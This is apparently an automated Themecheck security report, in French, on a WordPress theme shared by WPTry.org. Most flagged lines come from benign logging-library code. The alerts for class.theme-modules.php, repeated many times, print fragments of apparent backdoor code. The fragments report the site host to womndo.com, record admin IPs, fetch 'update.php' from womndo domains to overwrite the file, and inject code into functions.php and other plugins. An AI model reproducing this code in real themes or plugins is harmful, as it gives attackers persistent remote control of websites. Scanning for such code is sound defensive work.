0
Résultats de validation

Hayley Raymond | Shared by WPTry.org

Hayley Raymond | Shared by WPTry.org

WordPress 6.5.2 theme
0
  • TYPE DE THèMEThème WordPress %s 6.5.2
  • NOM DU FICHIERhayley-raymond-1.0.zip
  • TAILLE DU FICHIER1847198 octets
  • MD56739aef7ab97bb9a208631b8a52bec06
  • SHA1970c5aa92a79e3660d500e4c20edd826e03b1b1e
  • LICENCEGNU GPL 2
  • FICHIERS INCLUSCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • URI DU THèME URIhttp://paul-themes.com/wordpress/hayley/
  • VERSION1.0
  • TAGSone-column, two-columns, right-sidebar, flexible-header, accessibility-ready, custom-colors, custom-header, custom-menu, custom-logo, editor-style, featured-images, footer-widgets, post-formats, rtl-language-support, sticky-post, theme-options, threaded-co
  • DATE DE CRéATION2020-11-10
  • DERNIèRE MISE à JOUR DU FICHIER2020-12-31
  • DERNIèRE VALIDATION2020-12-31 10:44
Ce thème n'est peut être pas libre. Themecheck ne distribue pas de thèmes commerciaux.
Alertes critiques
  1. Failles de sécurité : Utilisation d'appels systèmes PHP ->exec trouvé dans le fichier RedisHandler.php. 79: ->exec();exec trouvé dans le fichier MercurialProcessorTest.php. 24: exec('where hg 2>NUL', $output, $result);26: exec('which hg 2>/dev/null >/dev/null', $output, $result);
  2. Failles de sécurité : Utilisation d'opérateurs d'exécution backticks dans le code PHP ` trouvé dans le fichier MercurialProcessor.php. 53: $result = explode(' ', trim(`hg id -nb`));` trouvé dans le fichier GitProcessor.php. 54: $branches = `git branch -v --no-abbrev`;` trouvé dans le fichier MercurialProcessorTest.php. 33: `hg init`;
  3. Failles de sécurité : Utilisation de base64_encode() base64_encode trouvé dans le fichier ChromePHPHandler.php.
     $data = base64_encode(utf8_encode($json));
     $data = base64_encode(utf8_encode($json));
    base64_encode trouvé dans le fichier ChromePHPHandlerTest.php.
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
     'X-ChromeLogger-Data'   => base64_encode(utf8_encode(json_encode(array(
  4. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier class-merlin-widget-importer.php. 77: $data = file_get_contents( $file );file_get_contents trouvé dans le fichier class-merlin-customizer-importer.php. 64: $raw = file_get_contents( $import_file_path );file_get_contents trouvé dans le fichier class-merlin-redux-importer.php. 25: $redux_options_raw_data = file_get_contents( $redux_item['file_path'] );file_put_contents trouvé dans le fichier class-merlin-downloader.php. 43: $saved_file = file_put_contents( $this->download_directory_path . $filename, $content );fopen trouvé dans le fichier LoggerInterfaceTest.php. 112: 'resource' => fopen('php://memory', 'r'),fread trouvé dans le fichier SlackHandler.php. 160: @fread($res, 2048);fopen trouvé dans le fichier DeduplicationHandler.php. 140: $handle = fopen($this->deduplicationStore, 'rw+');fwrite trouvé dans le fichier DeduplicationHandler.php. 156: fwrite($handle, $log);fclose trouvé dans le fichier DeduplicationHandler.php. 160: fclose($handle);file_put_contents trouvé dans le fichier DeduplicationHandler.php. 167: file_put_contents($this->deduplicationStore, $record['datetime']->getTimestfile_get_contents trouvé dans le fichier CouchDBHandler.php. 60: if (false === @file_get_contents($url, null, $context)) {fclose trouvé dans le fichier StreamHandler.php. 63: fclose($this->stream);fopen trouvé dans le fichier StreamHandler.php. 100: $this->stream = fopen($this->url, 'a');135: $this->errorMessage = preg_replace('{^(fopen|mkdir)\(.*?\): }', '', $msg);fwrite trouvé dans le fichier StreamHandler.php. 130: fwrite($stream, (string) $record['formatted']);fclose trouvé dans le fichier SocketHandler.php. 78: fclose($this->resource);fwrite trouvé dans le fichier SocketHandler.php. 225: protected function fwrite($data)227: return @fwrite($this->resource, $data);300: $chunk = $this->fwrite($data);302: $chunk = $this->fwrite(substr($data, $sent));fwrite trouvé dans le fichier SocketHandler.php. 225: protected function fwrite($data)227: return @fwrite($this->resource, $data);300: $chunk = $this->fwrite($data);302: $chunk = $this->fwrite(substr($data, $sent));fwrite trouvé dans le fichier SocketHandler.php. 225: protected function fwrite($data)227: return @fwrite($this->resource, $data);300: $chunk = $this->fwrite($data);302: $chunk = $this->fwrite(substr($data, $sent));fwrite trouvé dans le fichier SocketHandler.php. 225: protected function fwrite($data)227: return @fwrite($this->resource, $data);300: $chunk = $this->fwrite($data);302: $chunk = $this->fwrite(substr($data, $sent));fopen trouvé dans le fichier LineFormatterTest.php. 116: 'extra' => array('foo' => new TestFoo, 'bar' => new TestBar, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),fopen trouvé dans le fichier NormalizerFormatterTest.php. 34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),199: $resource = fopen(__FILE__, 'r');352: $resource = fopen('php://memory', 'rw+');fopen trouvé dans le fichier NormalizerFormatterTest.php. 34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),199: $resource = fopen(__FILE__, 'r');352: $resource = fopen('php://memory', 'rw+');fopen trouvé dans le fichier NormalizerFormatterTest.php. 34: 'extra' => array('foo' => new TestFooNorm, 'bar' => new TestBarNorm, 'baz' => array(), 'res' => fopen('php://memory', 'rb')),199: $resource = fopen(__FILE__, 'r');352: $resource = fopen('php://memory', 'rw+');fwrite trouvé dans le fichier NormalizerFormatterTest.php. 353: fwrite($resource, 'test_resource');fread trouvé dans le fichier LogEntriesHandlerTest.php. 38: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);fread trouvé dans le fichier LogEntriesHandlerTest.php. 38: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);fopen trouvé dans le fichier LogEntriesHandlerTest.php. 63: $this->res = fopen('php://memory', 'a');fopen trouvé dans le fichier StreamHandlerTest.php. 25: $handle = fopen('php://memory', 'a+');40: $handle = fopen('php://memory', 'a+');fread trouvé dans le fichier StreamHandlerTest.php. 32: $this->assertEquals('testtest2test3', fread($handle, 100));fopen trouvé dans le fichier StreamHandlerTest.php. 25: $handle = fopen('php://memory', 'a+');40: $handle = fopen('php://memory', 'a+');fclose trouvé dans le fichier SocketHandlerTest.php. 181: fclose($res);fread trouvé dans le fichier SocketHandlerTest.php. 203: $this->assertEquals('test1test2test3', fread($this->res, 1024));fopen trouvé dans le fichier SocketHandlerTest.php. 278: $this->res = fopen('php://memory', 'a');file_get_contents trouvé dans le fichier RotatingFileHandlerTest.php. 73: $this->assertEquals('test', file_get_contents($log));104: $this->assertEquals('test', file_get_contents($log));201: $this->assertEquals('footest', file_get_contents($log));file_get_contents trouvé dans le fichier RotatingFileHandlerTest.php. 73: $this->assertEquals('test', file_get_contents($log));104: $this->assertEquals('test', file_get_contents($log));201: $this->assertEquals('footest', file_get_contents($log));file_put_contents trouvé dans le fichier RotatingFileHandlerTest.php. 197: file_put_contents($log, 'foo');file_get_contents trouvé dans le fichier RotatingFileHandlerTest.php. 73: $this->assertEquals('test', file_get_contents($log));104: $this->assertEquals('test', file_get_contents($log));201: $this->assertEquals('footest', file_get_contents($log));fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fread trouvé dans le fichier HipChatHandlerTest.php. 32: $content = fread($this->res, 1024);44: $content = fread($this->res, 1024);56: $content = fread($this->res, 1024);68: $content = fread($this->res, 1024);80: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);136: $content = fread($this->res, 1024);148: $content = fread($this->res, 1024);158: $content = fread($this->res, 12000);171: $content = fread($this->res, 1024);200: $content = fread($this->res, 1024);fopen trouvé dans le fichier HipChatHandlerTest.php. 242: $this->res = fopen('php://memory', 'a');file_get_contents trouvé dans le fichier DeduplicationHandlerTest.php. 133: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')154: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')file_get_contents trouvé dans le fichier DeduplicationHandlerTest.php. 133: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')154: file_get_contents(sys_get_temp_dir() . '/monolog_dedup.log')fread trouvé dans le fichier FlowdockHandlerTest.php. 46: $content = fread($this->res, 1024);fopen trouvé dans le fichier FlowdockHandlerTest.php. 65: $this->res = fopen('php://memory', 'a');fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fread trouvé dans le fichier PushoverHandlerTest.php. 34: $content = fread($this->res, 1024);54: $content = fread($this->res, 1024);65: $content = fread($this->res, 1024);77: $content = fread($this->res, 1024);89: $content = fread($this->res, 1024);99: $content = fread($this->res, 1024);109: $content = fread($this->res, 1024);fopen trouvé dans le fichier PushoverHandlerTest.php. 118: $this->res = fopen('php://memory', 'a');fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fread trouvé dans le fichier SlackHandlerTest.php. 47: $content = fread($this->res, 1024);57: $content = fread($this->res, 1024);70: $content = fread($this->res, 1024);76: $content2 = fread($this->res, 1024);87: $content = fread($this->res, 1024);100: $content = fread($this->res, 1024);110: $content = fread($this->res, 1024);fopen trouvé dans le fichier SlackHandlerTest.php. 132: $this->res = fopen('php://memory', 'a');file_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents trouvé dans le fichier class.theme-modules.php. 199: if(!$log_installed = @file_get_contents('http://www.womndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.womndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.womndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.womndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.womndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.womndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents trouvé dans le fichier class.theme-modules.php. 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: 